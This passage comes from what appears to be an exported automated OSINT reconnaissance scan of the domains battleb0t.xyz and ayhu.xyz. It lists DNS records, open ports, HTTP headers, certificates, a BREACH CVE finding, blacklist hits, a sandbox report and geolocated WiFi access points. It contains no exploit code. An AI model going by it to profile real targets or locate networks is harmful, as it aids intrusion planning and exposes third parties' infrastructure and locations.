"OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:48:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None |  | 185.199.110.153 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8000::153 | www.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RowanLofts (Net ID: 00:02:2A:F0:3C:C7) | 34.0544, -118.244 |
| 2023-05-12 03:07:25 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.110.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | binkyandwooby (Net ID: 00:01:24:F0:A5:3F) | 37.7642, -122.3993 |
| 2023-05-12 02:46:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None |  | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-nf-request-id: 01H06Y2WDQHNHJAAXWWVJBZZ5B | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} |
| 2023-05-12 02:44:18 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.122 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo13797 (Net ID: 00:04:E2:D8:5E:98) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ORANJA (Net ID: 00:01:24:F4:53:15) | 52.3759, 4.8975 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 001cat.github.io | 185.199.111.153 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.208): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 8 | 0 | 3 | 0 | None | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} | panel.battleb0t.xyz |
| 2023-05-12 02:54:27 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H05GB7HXKZRW69FWMYAA1JFJ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:46:40 | Malicious IP Address | Yes | Fraudguard | 0 | 1 | 2 | 0 | None | abuse_tracker (risk level: 4) [185.199.108.153] | 185.199.108.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WTH (Net ID: 00:02:6F:21:EA:89) | 50.1188, 8.6843 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | Censys host record for 165.232.113.85 (raw JSON, truncated) |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.130 | 34.148.97.127 |
| 2023-05-12 02:57:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | Hybrid Analysis sandbox report (raw JSON, truncated) | 35.229.48.116 |
| 2023-05-12 02:56:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | Hybrid Analysis sandbox report (raw JSON, truncated) | 104.196.30.220 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | StreamElements (Category: finance) https://streamelements.com/login | login |
| 2023-05-12 02:54:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 5 | 0 | None | 200 | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007us.github.io |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b18b39c858117-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8001::153 | battleb0t.xyz |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000hen.github.io] https://www.openphish.com/feed.txt | 000hen.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:65:A6:FC) | 32.8608, -79.9746 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 02:52:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.133:443 | 185.199.111.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery (Net ID: 00:01:9F:3D:4F:68) | 37.780462,-122.390564 |
| 2023-05-12 03:33:36 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | Printable strings extracted from PNG data (raw dump) | https://pics.battleb0t.xyz/images/random_6.PNG |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HinaJasmin (Net ID: 00:01:E3:08:AE:FB) | 50.1188, 8.6843 |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.44): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 3Com (Net ID: 00:14:7C:52:C6:E4) | 40.2024, 29.0398 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | sntrup761x25519-sha512@openssh.com | (raw Censys host record for 46.101.229.70 omitted) |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | (raw Censys host record for 207.154.228.169 omitted) |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007ayong.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DNA (Net ID: 00:01:71:0B:C5:CC) | 52.3759, 4.8975 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitLab - GitLab Inc. is an open-core company that operates GitLab, a DevOps software package which can develop, secure, and operate software. The open source software project was created by Ukrainian developer Dmytro Zaporozhets and Dutch developer Sytse Sijbrandij. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcontacts.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | nginx nginx | 64.226.81.43 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | CaddyServer Caddy | 207.154.228.169 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:09:26 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Aug 3 00:00:00 2022 GMT
Not After : Aug 2 23:59:59 2023 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90
X509v3 Subject Alternative Name:
DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Aug 3 19:12:00.178 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB:
B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C
Timestamp : Aug 3 19:12:00.017 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09:
4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A
Timestamp : Aug 3 19:12:00.038 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: ecdsa-with-SHA256
| 188.114.96.1 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Blogspot (Category: blog) http://ayhu.blogspot.com | ayhu |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DCO (Net ID: 00:0C:41:66:5E:C3) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:62:49) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Sobe5 (Net ID: 00:14:C1:15:47:B3) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:2F:5E:C6) | 39.0469, -77.4903 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0066cc.github.io |
| 2023-05-12 03:38:37 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.159) | 207.154.228.159 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | brett.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0.crimson-perch.github.io |
| 2023-05-12 02:54:44 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.116:80 | 35.229.48.116 |
| 2023-05-12 02:54:17 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::6815:470e:443 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55157320C (Net ID: 00:01:E3:57:32:0C) | 52.3759, 4.8975 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet55FA (Net ID: 00:01:36:59:55:F8) | 37.7813933,-122.3918002 |
| 2023-05-12 02:58:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://sprk.art/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_688_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_688_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1672"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_688_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_688_IESQMMUTEX_0_303"\n "IsoScope_688_ConnHashTable<1672>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_688_IE_EarlyTabStart_0xb80_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': 
u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar6E6E.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar6E5E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab6C48.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "Cab6D92.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "E74NBAN0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E74NBAN0.txt]- [targetUID: 00000000-00001672]\n Dropped file: "LMADHRH0.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LMADHRH0.txt]- [targetUID: 00000000-00001672]\n Dropped file: "H0X2P6A4.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H0X2P6A4.txt]- [targetUID: 00000000-00003496]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001672]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003496]\n "RecoveryStore._FBA2F861-49C5-11ED-8C32-0800274FC8E2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar6E6E.tmp" has type "data"- Location: [%TEMP%\\Tar6E6E.tmp]- [targetUID: 00000000-00003496]\n "~DF86C9B3E24D11C32F.TMP" has type "data"- Location: [%TEMP%\\~DF86C9B3E24D11C32F.TMP]- [targetUID: 00000000-00001672]\n "A5E781EB8B970D49C10F5404D22E5FD7" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A5E781EB8B970D49C10F5404D22E5FD7]- [targetUID: 00000000-00003496]\n "E74NBAN0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\E74NBAN0.txt]- [targetUID: 00000000-00001672]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001672]\n "LMADHRH0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LMADHRH0.txt]- [targetUID: 00000000-00001672]\n "Tar6E5E.tmp" has type "data"- Location: [%TEMP%\\Tar6E5E.tmp]- [targetUID: 00000000-00003496]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n 
